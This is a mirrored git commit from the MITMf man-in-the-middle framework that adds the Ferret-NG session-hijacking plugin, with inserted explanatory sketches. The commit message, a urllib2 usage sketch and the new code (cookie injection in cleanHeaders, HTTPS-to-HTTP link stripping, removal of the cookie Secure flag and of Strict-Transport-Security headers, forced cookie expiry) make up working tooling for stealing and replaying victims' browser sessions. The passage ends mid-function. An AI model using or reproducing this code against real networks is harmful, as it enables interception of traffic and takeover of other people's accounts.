Mirror of https://github.com/byt3bl33d3r/MITMf.git (synced 2025-07-07 13:32:18 -07:00)
Initial working PoC for the Ferret-NG plugin, which will replace the SessionHijacker plugin: it captures cookies and transparently feeds them to the proxy it starts up on port 10010 (by default). This way we just have to connect to the proxy and browse to the same website as the victim, and we will automatically hijack their session! \o/
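Riding a captured session then boils down to pointing a browser, or a quick script, at the Ferret-NG proxy and requesting the same site as the victim; ClientRequest.cleanHeaders() (added below) swaps the captured Cookie header into the request. A minimal sketch, assuming the proxy runs locally on the default port and the victim was browsing the hypothetical http://target.example:

import urllib2

# 127.0.0.1:10010 = host/port of the Ferret-NG proxy (default port, MITMf running locally is assumed)
opener = urllib2.build_opener(urllib2.ProxyHandler({'http': 'http://127.0.0.1:10010'}))
print opener.open('http://target.example/account').read()  # served with the victim's cookies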
Other changes:
- The way MITMf hooks SSLstrip's functions has been modified to improve plugin code readability; additionally, corrected some useless function hooks that were placed in early framework releases and never removed.
- The Replace plugin has been given its own section in the config file.
- The BeEFAutorun and JavaPwn plugins currently still have to be cleaned up.
- The BrowserProfile plugin's Pinlady code has been updated to the latest version (v0.9.0) and will now detect the Flash Player version.
- The JavaPwn plugin will be renamed to BrowserPwn and will support Flash exploits too, as opposed to only Java exploits.
- Since we now have a built-in SMB server, removed the option to specify a host in the SMBauth plugin.
- Tweaked the output of some plugins.
This commit is contained in:
parent d3e509d4cd
commit 79025dc77e
33 changed files with 1080 additions and 5488 deletions
|
@ -94,6 +94,14 @@
|
|||
subnet = 255.255.255.0
|
||||
dns_server = 192.168.2.20 #optional
|
||||
|
||||
[Replace]
|
||||
|
||||
[[Regex1]]
|
||||
'Google Search' = 'Google In My Pants'
|
||||
|
||||
[[Regex2]]
|
||||
"I'm Feeling Lucky" = "I'm Feeling Something In My Pants"
|
||||
|
||||
[Responder]
|
||||
|
||||
#Set these values to On or Off, so you can control which rogue authentication server is turned on.
|
||||
|
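The new [Replace] section pairs a search pattern with its replacement in each [[RegexN]] subsection. The Replace plugin itself is not shown here, but applying such a section to a response body presumably comes down to something like this sketch (the pattern/replacement values are taken from the config above):

import re

replacements = {r'Google Search': 'Google In My Pants',
                r"I'm Feeling Lucky": "I'm Feeling Something In My Pants"}

def replace_in_body(data):
    # run every configured regex over the (already decompressed) response body
    for pattern, repl in replacements.items():
        data = re.sub(pattern, repl, data)
    return data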
@ -223,7 +231,7 @@
|
|||
skip_in_mass_poison=1
|
||||
#you can add other scripts in additional sections like jQuery etc.
|
||||
|
||||
[JavaPwn]
|
||||
[BrowserPwn]
|
||||
|
||||
#
|
||||
# All versions strings without a * are considered vulnerable if clients Java version is <= update version
|
||||
|
|
|
@ -12,7 +12,6 @@ mitmf_logger = logging.getLogger('mitmf')
|
|||
class ConfigWatcher(FileSystemEventHandler):
|
||||
|
||||
_instance = None
|
||||
|
||||
config = ConfigObj("./config/mitmf.conf")
|
||||
|
||||
@staticmethod
|
||||
|
@ -43,5 +42,5 @@ class ConfigWatcher(FileSystemEventHandler):
|
|||
try:
|
||||
self.config = ConfigObj("./config/mitmf.conf")
|
||||
except Exception as e:
|
||||
mitmf_logger.warning("Error reloading config file: {}".format(e))
|
||||
mitmf_logger.error("Error reloading config file: {}".format(e))
|
||||
pass
|
||||
|
|
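ConfigWatcher subclasses watchdog's FileSystemEventHandler, so the live reload above presumably gets scheduled on a watchdog Observer somewhere in the framework's startup, roughly like the sketch below (the getInstance() accessor and the watched path are assumptions based on the snippet above):

from watchdog.observers import Observer

observer = Observer()
# fire the handler whenever ./config changes, so mitmf.conf is re-read on the fly
observer.schedule(ConfigWatcher.getInstance(), path='./config', recursive=False)
observer.start()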
168 core/ferretNG/ClientRequest.py Normal file
|
@ -0,0 +1,168 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import urlparse
|
||||
import logging
|
||||
import os
|
||||
import sys
|
||||
import random
|
||||
import re
|
||||
|
||||
from twisted.web.http import Request
|
||||
from twisted.web.http import HTTPChannel
|
||||
from twisted.web.http import HTTPClient
|
||||
|
||||
from twisted.internet import ssl
|
||||
from twisted.internet import defer
|
||||
from twisted.internet import reactor
|
||||
from twisted.internet.protocol import ClientFactory
|
||||
|
||||
from ServerConnectionFactory import ServerConnectionFactory
|
||||
from ServerConnection import ServerConnection
|
||||
from SSLServerConnection import SSLServerConnection
|
||||
from URLMonitor import URLMonitor
|
||||
from CookieCleaner import CookieCleaner
|
||||
from DnsCache import DnsCache
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class ClientRequest(Request):
|
||||
|
||||
''' This class represents incoming client requests and is essentially where
|
||||
the magic begins. Here we remove the client headers we dont like, and then
|
||||
respond with either favicon spoofing, session denial, or proxy through HTTP
|
||||
or SSL to the server.
|
||||
'''
|
||||
|
||||
def __init__(self, channel, queued, reactor=reactor):
|
||||
Request.__init__(self, channel, queued)
|
||||
self.reactor = reactor
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
self.cookieCleaner = CookieCleaner.getInstance()
|
||||
self.dnsCache = DnsCache.getInstance()
|
||||
#self.uniqueId = random.randint(0, 10000)
|
||||
|
||||
def cleanHeaders(self):
|
||||
headers = self.getAllHeaders().copy()
|
||||
|
||||
if 'accept-encoding' in headers:
|
||||
del headers['accept-encoding']
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Zapped encoding")
|
||||
|
||||
if 'if-modified-since' in headers:
|
||||
del headers['if-modified-since']
|
||||
|
||||
if 'cache-control' in headers:
|
||||
del headers['cache-control']
|
||||
|
||||
if 'host' in headers:
|
||||
if headers['host'] in self.urlMonitor.cookies:
|
||||
mitmf_logger.info("[Ferret-NG] Hijacking session for host: {}".format(headers['host']))
|
||||
headers['cookie'] = self.urlMonitor.cookies[headers['host']]
|
||||
|
||||
return headers
|
||||
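How URLMonitor.cookies gets filled is not visible in this file; presumably the FerretNG plugin (plugins/FerretNG.py, further down) hooks client requests on the main proxy and stashes any Cookie header it sees, keyed by Host, along these lines (a hypothetical sketch, not the actual plugin code):

from core.ferretNG.URLMonitor import URLMonitor

def clientRequest(self, request):
    # capture side: remember the victim's Cookie header per host, so
    # cleanHeaders() above can replay it for whoever talks to the hijack proxy
    if 'cookie' in request.headers:
        URLMonitor.getInstance().cookies[request.headers['host']] = request.headers['cookie']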
|
||||
def getPathFromUri(self):
|
||||
if (self.uri.find("http://") == 0):
|
||||
index = self.uri.find('/', 7)
|
||||
return self.uri[index:]
|
||||
|
||||
return self.uri
|
||||
|
||||
def handleHostResolvedSuccess(self, address):
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
|
||||
host = self.getHeader("host")
|
||||
headers = self.cleanHeaders()
|
||||
client = self.getClientIP()
|
||||
path = self.getPathFromUri()
|
||||
url = 'http://' + host + path
|
||||
self.uri = url # set URI to absolute
|
||||
|
||||
if self.content:
|
||||
self.content.seek(0,0)
|
||||
|
||||
postData = self.content.read()
|
||||
|
||||
hostparts = host.split(':')
|
||||
self.dnsCache.cacheResolution(hostparts[0], address)
|
||||
|
||||
if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending expired cookies")
|
||||
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
|
||||
|
||||
elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
|
||||
if 'securelink' in headers:
|
||||
del headers['securelink']
|
||||
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending request via SSL ({})".format((client,url)))
|
||||
self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
|
||||
|
||||
else:
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Sending request via HTTP")
|
||||
#self.proxyViaHTTP(address, self.method, path, postData, headers)
|
||||
port = 80
|
||||
if len(hostparts) > 1:
|
||||
port = int(hostparts[1])
|
||||
|
||||
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
|
||||
|
||||
def handleHostResolvedError(self, error):
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Host resolution error: {}".format(error))
|
||||
try:
|
||||
self.finish()
|
||||
except:
|
||||
pass
|
||||
|
||||
def resolveHost(self, host):
|
||||
address = self.dnsCache.getCachedAddress(host)
|
||||
|
||||
if address != None:
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Host cached: {} {}".format(host, address))
|
||||
return defer.succeed(address)
|
||||
else:
|
||||
return reactor.resolve(host)
|
||||
|
||||
def process(self):
|
||||
mitmf_logger.debug("[Ferret-NG] [ClientRequest] Resolving host: {}".format(self.getHeader('host')))
|
||||
host = self.getHeader('host').split(":")[0]
|
||||
|
||||
deferred = self.resolveHost(host)
|
||||
deferred.addCallback(self.handleHostResolvedSuccess)
|
||||
deferred.addErrback(self.handleHostResolvedError)
|
||||
|
||||
def proxyViaHTTP(self, host, method, path, postData, headers, port):
|
||||
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
|
||||
connectionFactory.protocol = ServerConnection
|
||||
#self.reactor.connectTCP(host, 80, connectionFactory)
|
||||
self.reactor.connectTCP(host, port, connectionFactory)
|
||||
|
||||
def proxyViaSSL(self, host, method, path, postData, headers, port):
|
||||
clientContextFactory = ssl.ClientContextFactory()
|
||||
connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
|
||||
connectionFactory.protocol = SSLServerConnection
|
||||
self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)
|
||||
|
||||
def sendExpiredCookies(self, host, path, expireHeaders):
|
||||
self.setResponseCode(302, "Moved")
|
||||
self.setHeader("Connection", "close")
|
||||
self.setHeader("Location", "http://" + host + path)
|
||||
|
||||
for header in expireHeaders:
|
||||
self.setHeader("Set-Cookie", header)
|
||||
|
||||
self.finish()
|
105 core/ferretNG/CookieCleaner.py Normal file
|
@ -0,0 +1,105 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import logging
|
||||
import string
|
||||
|
||||
class CookieCleaner:
|
||||
'''This class cleans cookies we haven't seen before. The basic idea is to
|
||||
kill sessions, which isn't entirely straight-forward. Since we want this to
|
||||
be generalized, there's no way for us to know exactly what cookie we're trying
|
||||
to kill, which also means we don't know what domain or path it has been set for.
|
||||
|
||||
The rule with cookies is that specific overrides general. So cookies that are
|
||||
set for mail.foo.com override cookies with the same name that are set for .foo.com,
|
||||
just as cookies that are set for foo.com/mail override cookies with the same name
|
||||
that are set for foo.com/
|
||||
|
||||
The best we can do is guess, so we just try to cover our bases by expiring cookies
|
||||
in a few different ways. The most obvious thing to do is look for individual cookies
|
||||
and nail the ones we haven't seen coming from the server, but the problem is that cookies are often
|
||||
set by Javascript instead of a Set-Cookie header, and if we block those the site
|
||||
will think cookies are disabled in the browser. So we do the expirations and whitelisting
|
||||
based on client,server tuples. The first time a client hits a server, we kill whatever
|
||||
cookies we see then. After that, we just let them through. Not perfect, but pretty effective.
|
||||
|
||||
'''
|
||||
|
||||
_instance = None
|
||||
|
||||
def __init__(self):
|
||||
self.cleanedCookies = set();
|
||||
self.enabled = False
|
||||
|
||||
@staticmethod
|
||||
def getInstance():
|
||||
if CookieCleaner._instance == None:
|
||||
CookieCleaner._instance = CookieCleaner()
|
||||
|
||||
return CookieCleaner._instance
|
||||
|
||||
def setEnabled(self, enabled):
|
||||
self.enabled = enabled
|
||||
|
||||
def isClean(self, method, client, host, headers):
|
||||
if method == "POST": return True
|
||||
if not self.enabled: return True
|
||||
if not self.hasCookies(headers): return True
|
||||
|
||||
return (client, self.getDomainFor(host)) in self.cleanedCookies
|
||||
|
||||
def getExpireHeaders(self, method, client, host, headers, path):
|
||||
domain = self.getDomainFor(host)
|
||||
self.cleanedCookies.add((client, domain))
|
||||
|
||||
expireHeaders = []
|
||||
|
||||
for cookie in headers['cookie'].split(";"):
|
||||
cookie = cookie.split("=")[0].strip()
|
||||
expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path)
|
||||
expireHeaders.extend(expireHeadersForCookie)
|
||||
|
||||
return expireHeaders
|
||||
|
||||
def hasCookies(self, headers):
|
||||
return 'cookie' in headers
|
||||
|
||||
def getDomainFor(self, host):
|
||||
hostParts = host.split(".")
|
||||
return "." + hostParts[-2] + "." + hostParts[-1]
|
||||
|
||||
def getExpireCookieStringFor(self, cookie, host, domain, path):
|
||||
pathList = path.split("/")
|
||||
expireStrings = list()
|
||||
|
||||
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain +
|
||||
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
|
||||
|
||||
expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host +
|
||||
";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
|
||||
|
||||
if len(pathList) > 2:
|
||||
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
|
||||
domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
|
||||
|
||||
expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
|
||||
host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")
|
||||
|
||||
return expireStrings
|
||||
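For example, a first request from a client to the hypothetical host mail.example.com carrying a SESSIONID cookie gets answered with a redirect whose expiry headers come out of getExpireCookieStringFor(); note that getDomainFor() naively keeps only the last two labels, so multi-part TLDs such as .co.uk are not handled:

cc = CookieCleaner.getInstance()
cc.getDomainFor('mail.example.com')
# -> '.example.com'
cc.getExpireCookieStringFor('SESSIONID', 'mail.example.com', '.example.com', '/')[0]
# -> 'SESSIONID=EXPIRED;Path=/;Domain=.example.com;Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n'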
|
||||
|
49 core/ferretNG/DnsCache.py Normal file
|
@ -0,0 +1,49 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import logging
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class DnsCache:
|
||||
|
||||
'''
|
||||
The DnsCache maintains a cache of DNS lookups, mirroring the browser experience.
|
||||
'''
|
||||
|
||||
_instance = None
|
||||
|
||||
def __init__(self):
|
||||
self.customAddress = None
|
||||
self.cache = {}
|
||||
|
||||
@staticmethod
|
||||
def getInstance():
|
||||
if DnsCache._instance == None:
|
||||
DnsCache._instance = DnsCache()
|
||||
|
||||
return DnsCache._instance
|
||||
|
||||
def cacheResolution(self, host, address):
|
||||
self.cache[host] = address
|
||||
|
||||
def getCachedAddress(self, host):
|
||||
if host in self.cache:
|
||||
return self.cache[host]
|
||||
|
||||
return None
|
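Usage is straightforward; the host/address pair below is purely illustrative:

cache = DnsCache.getInstance()
cache.cacheResolution('mail.example.com', '192.0.2.10')
cache.getCachedAddress('mail.example.com')    # -> '192.0.2.10'
cache.getCachedAddress('other.example.com')   # -> None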
24 core/ferretNG/FerretProxy.py Normal file
|
@ -0,0 +1,24 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
from twisted.web.http import HTTPChannel
|
||||
from ClientRequest import ClientRequest
|
||||
|
||||
class FerretProxy(HTTPChannel):
|
||||
|
||||
requestFactory = ClientRequest
|
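FerretProxy only swaps ClientRequest in as the request factory; actually serving it on the hijack port presumably happens in the FerretNG plugin with a plain twisted HTTPFactory, along these lines (the timeout value and the surrounding reactor handling are assumptions):

from twisted.web import http
from twisted.internet import reactor

factory = http.HTTPFactory(timeout=10)
factory.protocol = FerretProxy
reactor.listenTCP(10010, factory)   # 10010 = Ferret-NG's default port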
110 core/ferretNG/SSLServerConnection.py Normal file
|
@ -0,0 +1,110 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import logging, re, string
|
||||
|
||||
from ServerConnection import ServerConnection
|
||||
from URLMonitor import URLMonitor
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class SSLServerConnection(ServerConnection):
|
||||
|
||||
'''
|
||||
For SSL connections to a server, we need to do some additional stripping. First we need
|
||||
to make note of any relative links, as the server will be expecting those to be requested
|
||||
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
|
||||
'''
|
||||
|
||||
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
|
||||
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
|
||||
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
|
||||
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
|
||||
headExpression = re.compile(r"<head>", re.IGNORECASE)
|
||||
|
||||
def __init__(self, command, uri, postData, headers, client):
|
||||
ServerConnection.__init__(self, command, uri, postData, headers, client)
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
|
||||
def getLogLevel(self):
|
||||
return logging.INFO
|
||||
|
||||
def getPostPrefix(self):
|
||||
return "SECURE POST"
|
||||
|
||||
def handleHeader(self, key, value):
|
||||
if (key.lower() == 'set-cookie'):
|
||||
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
|
||||
|
||||
ServerConnection.handleHeader(self, key, value)
|
||||
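Stripping the Secure attribute keeps the session cookie usable over the plain-HTTP side of the strip; for instance, with a hypothetical cookie value:

SSLServerConnection.cookieExpression.sub("\g<1>", "SESSIONID=abc123; Secure; HttpOnly")
# -> 'SESSIONID=abc123; HttpOnly'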
|
||||
def stripFileFromPath(self, path):
|
||||
(strippedPath, lastSlash, file) = path.rpartition('/')
|
||||
return strippedPath
|
||||
|
||||
def buildAbsoluteLink(self, link):
|
||||
absoluteLink = ""
|
||||
|
||||
if ((not link.startswith('http')) and (not link.startswith('/'))):
|
||||
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
|
||||
|
||||
mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] Found path-relative link in secure transmission: " + link)
|
||||
mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] New Absolute path-relative link: " + absoluteLink)
|
||||
elif not link.startswith('http'):
|
||||
absoluteLink = "http://"+self.headers['host']+link
|
||||
|
||||
mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] Found relative link in secure transmission: " + link)
|
||||
mitmf_logger.debug("[Ferret-NG] [SSLServerConnection] New Absolute link: " + absoluteLink)
|
||||
|
||||
if not absoluteLink == "":
|
||||
absoluteLink = absoluteLink.replace('&', '&')
|
||||
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
|
||||
|
||||
def replaceCssLinks(self, data):
|
||||
iterator = re.finditer(SSLServerConnection.cssExpression, data)
|
||||
|
||||
for match in iterator:
|
||||
self.buildAbsoluteLink(match.group(1))
|
||||
|
||||
return data
|
||||
|
||||
def replaceFavicon(self, data):
|
||||
match = re.search(SSLServerConnection.iconExpression, data)
|
||||
|
||||
if (match != None):
|
||||
data = re.sub(SSLServerConnection.iconExpression,
|
||||
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
|
||||
else:
|
||||
data = re.sub(SSLServerConnection.headExpression,
|
||||
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
|
||||
|
||||
return data
|
||||
|
||||
def replaceSecureLinks(self, data):
|
||||
data = ServerConnection.replaceSecureLinks(self, data)
|
||||
data = self.replaceCssLinks(data)
|
||||
|
||||
if (self.urlMonitor.isFaviconSpoofing()):
|
||||
data = self.replaceFavicon(data)
|
||||
|
||||
iterator = re.finditer(SSLServerConnection.linkExpression, data)
|
||||
|
||||
for match in iterator:
|
||||
self.buildAbsoluteLink(match.group(10))
|
||||
|
||||
return data
|
193 core/ferretNG/ServerConnection.py Normal file
|
@ -0,0 +1,193 @@
|
|||
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import logging
|
||||
import re
|
||||
import string
|
||||
import random
|
||||
import zlib
|
||||
import gzip
|
||||
import StringIO
|
||||
import sys
|
||||
|
||||
from twisted.web.http import HTTPClient
|
||||
from URLMonitor import URLMonitor
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class ServerConnection(HTTPClient):
|
||||
|
||||
''' The server connection is where we do the bulk of the stripping. Everything that
|
||||
comes back is examined. The headers we dont like are removed, and the links are stripped
|
||||
from HTTPS to HTTP.
|
||||
'''
|
||||
|
||||
urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
|
||||
urlType = re.compile(r"https://", re.IGNORECASE)
|
||||
urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
|
||||
urlTypewww = re.compile(r"https://www", re.IGNORECASE)
|
||||
urlwExplicitPort = re.compile(r'https://www([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)
|
||||
urlToken1 = re.compile(r'(https://[a-zA-Z0-9./]+\?)', re.IGNORECASE)
|
||||
urlToken2 = re.compile(r'(https://[a-zA-Z0-9./]+)\?{0}', re.IGNORECASE)
|
||||
#urlToken2 = re.compile(r'(https://[a-zA-Z0-9.]+/?[a-zA-Z0-9.]*/?)\?{0}', re.IGNORECASE)
|
||||
|
||||
def __init__(self, command, uri, postData, headers, client):
|
||||
|
||||
self.command = command
|
||||
self.uri = uri
|
||||
self.postData = postData
|
||||
self.headers = headers
|
||||
self.client = client
|
||||
self.clientInfo = None
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
self.isImageRequest = False
|
||||
self.isCompressed = False
|
||||
self.contentLength = None
|
||||
self.shutdownComplete = False
|
||||
|
||||
def getPostPrefix(self):
|
||||
return "POST"
|
||||
|
||||
def sendRequest(self):
|
||||
if self.command == 'GET':
|
||||
|
||||
mitmf_logger.debug(self.client.getClientIP() + " [Ferret-NG] Sending Request: {}".format(self.headers['host']))
|
||||
|
||||
self.sendCommand(self.command, self.uri)
|
||||
|
||||
def sendHeaders(self):
|
||||
for header, value in self.headers.iteritems():
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Sending header: ({}: {})".format(header, value))
|
||||
self.sendHeader(header, value)
|
||||
|
||||
self.endHeaders()
|
||||
|
||||
def sendPostData(self):
|
||||
|
||||
self.transport.write(self.postData)
|
||||
|
||||
def connectionMade(self):
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] HTTP connection made.")
|
||||
self.sendRequest()
|
||||
self.sendHeaders()
|
||||
|
||||
if (self.command == 'POST'):
|
||||
self.sendPostData()
|
||||
|
||||
def handleStatus(self, version, code, message):
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Server response: {} {} {}".format(version, code, message))
|
||||
self.client.setResponseCode(int(code), message)
|
||||
|
||||
def handleHeader(self, key, value):
|
||||
if (key.lower() == 'location'):
|
||||
value = self.replaceSecureLinks(value)
|
||||
|
||||
if (key.lower() == 'content-type'):
|
||||
if (value.find('image') != -1):
|
||||
self.isImageRequest = True
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Response is image content, not scanning")
|
||||
|
||||
if (key.lower() == 'content-encoding'):
|
||||
if (value.find('gzip') != -1):
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Response is compressed")
|
||||
self.isCompressed = True
|
||||
|
||||
elif (key.lower()== 'strict-transport-security'):
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Zapped a strict-trasport-security header")
|
||||
|
||||
elif (key.lower() == 'content-length'):
|
||||
self.contentLength = value
|
||||
|
||||
elif (key.lower() == 'set-cookie'):
|
||||
self.client.responseHeaders.addRawHeader(key, value)
|
||||
|
||||
else:
|
||||
self.client.setHeader(key, value)
|
||||
|
||||
def handleEndHeaders(self):
|
||||
if (self.isImageRequest and self.contentLength != None):
|
||||
self.client.setHeader("Content-Length", self.contentLength)
|
||||
|
||||
if self.length == 0:
|
||||
self.shutdown()
|
||||
|
||||
if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG":
|
||||
for header, value in self.client.headers.iteritems():
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Receiving header: ({}: {})".format(header, value))
|
||||
|
||||
def handleResponsePart(self, data):
|
||||
if (self.isImageRequest):
|
||||
self.client.write(data)
|
||||
else:
|
||||
HTTPClient.handleResponsePart(self, data)
|
||||
|
||||
def handleResponseEnd(self):
|
||||
if (self.isImageRequest):
|
||||
self.shutdown()
|
||||
else:
|
||||
try:
|
||||
HTTPClient.handleResponseEnd(self) #Gets rid of some generic errors
|
||||
except:
|
||||
pass
|
||||
|
||||
def handleResponse(self, data):
|
||||
if (self.isCompressed):
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Decompressing content...")
|
||||
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
|
||||
|
||||
data = self.replaceSecureLinks(data)
|
||||
|
||||
mitmf_logger.debug("[Ferret-NG] [ServerConnection] Read from server {} bytes of data".format(len(data)))
|
||||
|
||||
if (self.contentLength != None):
|
||||
self.client.setHeader('Content-Length', len(data))
|
||||
|
||||
try:
|
||||
self.client.write(data)
|
||||
except:
|
||||
pass
|
||||
|
||||
try:
|
||||
self.shutdown()
|
||||
except:
|
||||
